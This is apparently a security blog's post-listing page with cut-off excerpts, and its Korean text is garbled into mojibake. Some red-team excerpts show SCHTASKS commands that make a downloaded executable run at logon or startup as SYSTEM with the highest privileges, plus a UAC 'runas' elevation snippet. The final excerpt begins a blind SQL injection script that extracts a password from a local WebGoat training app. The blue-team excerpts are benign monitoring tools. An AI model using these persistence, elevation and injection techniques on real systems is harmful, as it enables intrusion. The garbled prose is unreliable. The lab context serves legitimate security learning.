๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
ํด๋น ํ์ด์ฌ ํจ์๋ก ์๋์ ๊ฐ์ด ์ต๊ณ ๊ถํ์ ํ๋ก๊ทธ๋จ ์คํ์ ํ ์ ์๋ค. os.system(f'SCHTASKS /Create /TN {SVC_NAME} /SC ONLOGON /TR {SVC_PROG_PATH} /RL HIGHEST') ๋๋ ์ผ๋ฐ ๋ช
๋ น์ด๋ก SCHTASKS /Create /TN "Go" /SC ONSTART /TR "C:\Users\AidenLee\Downloads\go.exe" /RL HIGHEST /RU "SYSTEM" ์์ฉ os.system()์ ์ฌ์ฉํ์ฌ Windows์์ ๊ถํ ์์น์ ์์ฒญํ๋ ๋ฐฉ๋ฒ ์ค ํ๋๋ ์์
์ค์ผ์ค๋ฌ(Task Scheduler)๋ฅผ ์ฌ์ฉํ๋ ๊ฒ์
๋๋ค. ์ด๋ฏธ ์ฌ์ฉํ๊ณ ๊ณ์ SCHTASKS ๋ช
๋ น์ ์ด ๋ฐฉ๋ฒ ์ค ํ๋์
๋๋ค. ์๋๋ ๋ค๋ฅธ ๋ช ๊ฐ์ง ๋ฐฉ๋ฒ์ ์ ๊ณตํฉ๋๋ค. ru..
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
์จ๋ผ์ธ์์ ๋ฐ๊ฒฌ๋๋ ๊ธฐ์กด ํ์ด์ฌ ๊ถํ ์์น ์์ฒญ ์ฝ๋์ ๊ฒฝ์ฐ ํจํค์ง ์ด๋ฆ์ด win32com์์ shell์ ์์ฒญํ์ง๋ง 2022๋
๊ธฐ์ค win32comext์ ์กด์ฌํ๋ค. import os import sys # win32com.shell์ด ์๋ win32comext ์ด๋ค from win32comext.shell import shell ASADMIN = 'asadmin' print(sys.argv) if sys.argv[-1] != ASADMIN: script = os.path.abspath(sys.argv[0]) params = ' '.join([script] + sys.argv[1:] + [ASADMIN]) shell.ShellExecuteEx(lpVerb='runas', lpFile=sys.execut..
๐ค์ ๋ณด๋ณด์/๐๋ธ๋ฃจํ
๋์ธ๋ก ์๋น์ค๋๋ ํํ์ด์ง์ ๋ค์ด ์ฌ๋ถ ๋ฐ ์ ๊ทผ ๋ถ๊ฐ ์ํ๋ฅผ ํ๋ณํด์ฃผ๋ ํ๋ก๊ทธ๋จ์ด๋ค. ์คํ ํ ๋ฉ์ผ ๋ฐ์กํ๋ ๊ธฐ๋ฅ๊น์ง ์๋ค. ๋ฉ์ผ ๋ณธ๋ฌธ์ OX ์ํ์ ๋ฌด๋ง ๋ ๋ผ๊ฐ๋ค. ์๋น์ค ์ค์ผ์ค๋ฌ๋ก ๋ฑ๋กํ์ฌ ํฌ์ค์ฒดํฌ๋ฅผ ํ ์ ์๋ค. ๋์ธ์๋น์ค ๋์์ด๋ฏ๋ก ํ์ฌ ๋ด๋ถ๋ง์์ ์คํํ๋ฉด ๊ฒฐ๊ณผ๊ฐ์ด ๋ฌ๋ผ์ง๋ค. ํ์ฌ๋ด๋ถ๋ง์์ VPN ์ฌ์ดํธ์ ์ ์ํ๋ ค๊ณ ํ๋ค๋๊ฐ ๊ทธ๋ฌ๋ฉด ์ํ๋ X๊ฐ ๋ฐ ์๋ ์๋ค. ์ธ๋ถ์ฌ์ดํธ ์ ๊ทผ์ ํ์ด ๋๋ฉด X๊ฐ ๋ฐ ์๋ ์๋ค. import sys from PyQt5.QtWidgets import (QApplication, QWidget, QGridLayout, QLabel, QLineEdit, QTextEdit) import requests as r import socket import smtplib r.package..
๐ค์ ๋ณด๋ณด์/๐๋ธ๋ฃจํ
IP๋ก ์๋น์ค๋ฅผ ์ ๊ทผํ์์๋ ์ ๊ทผ ๊ฐ๋ฅํ ๊ฒ์ ์ทจ์ฝ์ผ๋ก ํ๋จํ๋ ๋ถ๋ฅ ์์ค์ฝ๋์ด๋ค. ์ ๊ฒ ๊ฒฐ๊ณผ๋ Excel๋ก ํ์ธ ๊ฐ๋ฅํ๋ค ์ฌ์ดํธ์ ์ง์ ์ ๊ทผํ์ฌ ํ์ธํด์ผํ๋ ์๋์ ๊ฒ ํญ๋ชฉ์ด ์๋ค. ์ฝ์&์์
๋ฒ์ import requests from openpyxl import Workbook requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) class bcolors: HEADER = "\033[95m" OKBLUE = "\033[94m" OKCYAN = "\033[96m" OKGREEN = "\033[92m" WARNING = "\033[93m" FAIL = "\033[91m" EN..
๐ค์ ๋ณด๋ณด์/๐๋ธ๋ฃจํ
import os import socket from urllib.parse import urlparse def nslookup(DOMAIN): try: ip_list = [] ais = socket.getaddrinfo(DOMAIN, 0, 0, 0, 0) for result in ais: ip_list.append(result[-1][0]) ip_list = list(set(ip_list)) return (',').join(ip_list) except: return "N/A" def getDomain(PATH, FNAME): # print PATH + '\\' + FNAME with open(PATH + '\\' + FNAME, 'r') as f: maldomain = f.readlines() if le..
๐ค์ ๋ณด๋ณด์/โค๏ธ๋ ๋ํ
import requests password = str() cre = "created" url = "http://localhost:8080/WebGoat/SqlInjection/challenge" cookie = {'JSESSIONID':'8B10E84050C998DD12174E500DBA38F6'} print ('[*] Get password length...') password_length = int() for length in range(1,30): datas = {'username_reg' : "tom' and length(password) = %d and '1'='1" % length, 'email_reg' : 'test@test.com', 'password_reg' : '1111', 'conf..